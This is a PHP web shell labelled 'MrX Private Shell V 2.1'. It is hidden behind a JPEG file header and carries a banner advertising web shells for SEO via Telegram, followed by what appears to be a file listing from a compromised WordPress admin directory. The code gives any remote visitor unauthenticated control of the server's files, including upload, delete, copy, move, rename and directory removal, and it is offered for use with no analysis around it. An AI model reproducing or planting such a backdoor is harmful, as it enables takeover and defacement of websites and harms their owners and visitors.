����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<html>
<body>
<style type="text/css">
body {
background: #ffffff;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link {
color: #33CC99;
}
a:visited {
color: #269771;
}
a:hover {
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php
error_reporting( 0 );
set_time_limit( 0 );
if ( empty ( $_GET ['dir'] ) ) {
$dir = getcwd();
} else {
$dir = $_GET ['dir'];
}
chdir( $dir );
$current = htmlentities( $_SERVER ['PHP_SELF'] . "?dir=" . $dir );
echo "<i>Server: " . $_SERVER ['SERVER_NAME'] . "<br>";
echo "Current directory: " . getcwd() . "<br>";
echo "Software: " . $_SERVER ['SERVER_SOFTWARE'];
echo "<br>";
echo "<br>";
echo "<form action = '" . $current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>";
echo "<input type = 'submit' value = 'Upload'>";
echo "</form><br>";
$mode = $_GET ['mode'];
switch ( $mode ) {
case 'delete':
$file = $_GET ['file'];
if ( unlink( $file ) ) {
echo $file . " deleted successfully.<p>";
} else {
echo "Unable to delete " . $file . ".<p>";
}
break;
case 'copy':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if ( empty ( $dst ) ) {
echo "<form action = '" . $current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Copy'></form>\n";
} else {
if ( copy( $src, $dst ) ) {
echo "File copied successfully.<p>\n";
} else {
echo "Unable to copy " . $src . ".<p>\n";
}
}
break;
case 'move':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if ( empty ( $dst ) ) {
echo "<form action = '" . $current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Move'></form>\n";
} else {
if ( rename( $src, $dst ) ) {
echo "File moved successfully.<p>\n";
} else {
echo "Unable to move " . $src . ".<p>\n";
}
}
break;
case 'rename':
$old = $_GET ['old'];
$new = $_POST ['new'];
if ( empty ( $new ) ) {
echo "<form action = '" . $current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
echo "New name: <input name = 'new'><br>\n";
echo "<input type = 'submit' value = 'Rename'></form>\n";
} else {
if ( rename( $old, $new ) ) {
echo "File/Directory renamed successfully.<p>\n";
} else {
echo "Unable to rename " . $old . ".<p>\n";
}
}
break;
case 'rmdir':
$rm = $_GET ['rm'];
if ( rmdir( $rm ) ) {
echo "Directory removed successfully.<p>\n";
} else {
echo "Unable to remove " . $rm . ".<p>\n";
}
break;
case 'upload':
$temp = $_FILES['upload_file']['tmp_name'];
$file = basename( $_FILES['upload_file']['name'] );
if ( ! empty ( $file ) ) {
if ( move_uploaded_file( $temp, $file ) ) {
echo "File uploaded successfully.<p>\n";
unlink( $temp );
} else {
echo "Unable to upload " . $file . ".<p>\n";
}
}
break;
}
clearstatcache();
echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir( $dir );
foreach ( $files as $file ) {
if ( is_dir( $file ) ) {
$items = scandir( $file );
$items_num = count( $items ) - 2;
echo "<tr><td><a href = " . $current . "/" . $file . ">" . $file . "</a></td>";
echo "<td>" . $items_num . " Items</td>";
echo "<td><a href = " . $current . "&mode=rmdir&rm=" . $file . ">Remove directory</a></td>";
echo "<td>-</td>";
echo "<td>-</td>";
echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Rename directory</a></td></tr>";
}
}
foreach ( $files as $file ) {
if ( is_file( $file ) ) {
$size = round( filesize( $file ) / 1024, 2 );
echo "<tr><td>" . $file . "</td>";
echo "<td>" . $size . " KB</td>";
echo "<td><a href = " . $current . "&mode=delete&file=" . $file . ">Delete</a></td>";
echo "<td><a href = " . $current . "&mode=copy&src=" . $file . ">Copy</a></td>";
echo "<td><a href = " . $current . "&mode=move&src=" . $file . ">Move</a></td>";
echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Rename</a></td></tr>";
}
}
echo "</table><br>";
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| css | Folder | 0755 |
|
|
| images | Folder | 0755 |
|
|
| includes | Folder | 0755 |
|
|
| js | Folder | 0755 |
|
|
| maint | Folder | 0755 |
|
|
| network | Folder | 0755 |
|
|
| user | Folder | 0755 |
|
|
| about.php | File | 16.08 KB | 0644 |
|
| admin-footer.php | File | 2.77 KB | 0644 |
|
| admin-functions.php | File | 479 B | 0644 |
|
| admin-header.php | File | 9.12 KB | 0644 |
|
| admin.php | File | 12.35 KB | 0644 |
|
| authorize-application.php | File | 10.09 KB | 0644 |
|
| contribute.php | File | 5.86 KB | 0644 |
|
| credits.php | File | 4.38 KB | 0644 |
|
| custom-background.php | File | 489 B | 0644 |
|
| customize.php | File | 11.01 KB | 0644 |
|
| edit-comments.php | File | 14.38 KB | 0644 |
|
| edit-form-advanced.php | File | 28.83 KB | 0644 |
|
| edit-form-blocks.php | File | 14.6 KB | 0644 |
|
| edit-form-comment.php | File | 8.34 KB | 0644 |
|
| edit-link-form.php | File | 6.21 KB | 0644 |
|
| edit-tag-form.php | File | 10.44 KB | 0644 |
|
| edit-tags.php | File | 22 KB | 0644 |
|
| edit.php | File | 19.48 KB | 0644 |
|
| erase-personal-data.php | File | 7.33 KB | 0644 |
|
| export-personal-data.php | File | 7.75 KB | 0644 |
|
| export.php | File | 11.02 KB | 0644 |
|
| freedoms.php | File | 4.8 KB | 0644 |
|
| import.php | File | 7.58 KB | 0644 |
|
| index.php.txt | File | 420 B | 0644 |
|
| install.php | File | 17.77 KB | 0644 |
|
| link-parse-opml.php | File | 2.72 KB | 0644 |
|
| link.php | File | 2.89 KB | 0644 |
|
| load-scripts.php | File | 2.02 KB | 0644 |
|
| load-styles.php | File | 2.92 KB | 0644 |
|
| media-upload.php | File | 3.58 KB | 0644 |
|
| media.php | File | 819 B | 0644 |
|
| moderation.php | File | 307 B | 0664 |
|
| ms-admin.php | File | 196 B | 0664 |
|
| ms-delete-site.php | File | 4.5 KB | 0644 |
|
| ms-edit.php | File | 216 B | 0664 |
|
| ms-sites.php | File | 215 B | 0664 |
|
| ms-themes.php | File | 217 B | 0664 |
|
| ms-upgrade-network.php | File | 219 B | 0664 |
|
| my-sites.php | File | 4.74 KB | 0644 |
|
| network.php | File | 5.39 KB | 0644 |
|
| options-discussion.php | File | 15.92 KB | 0644 |
|
| options-head.php | File | 621 B | 0644 |
|
| options-permalink.php | File | 21.22 KB | 0644 |
|
| options-privacy.php | File | 9.95 KB | 0644 |
|
| options.php | File | 13.6 KB | 0644 |
|
| plugin-editor.php | File | 13.75 KB | 0644 |
|
| plugin-install.php | File | 6.96 KB | 0644 |
|
| post-new.php | File | 2.7 KB | 0644 |
|
| post.php | File | 10.03 KB | 0644 |
|
| press-this.php | File | 2.34 KB | 0644 |
|
| privacy-policy-guide.php | File | 3.67 KB | 0644 |
|
| privacy.php | File | 2.79 KB | 0644 |
|
| revision.php | File | 5.7 KB | 0644 |
|
| site-editor.php | File | 11.98 KB | 0644 |
|
| site-health-info.php | File | 3.99 KB | 0644 |
|
| theme-install.php | File | 23.38 KB | 0644 |
|
| themes.php | File | 47.92 KB | 0644 |
|
| update-core-character.php | File | 4.18 KB | 0644 |
|
| update-core.php | File | 45.45 KB | 0644 |
|
| widgets-form-blocks.php | File | 5.12 KB | 0644 |
|
| widgets-form.php | File | 19.29 KB | 0644 |
|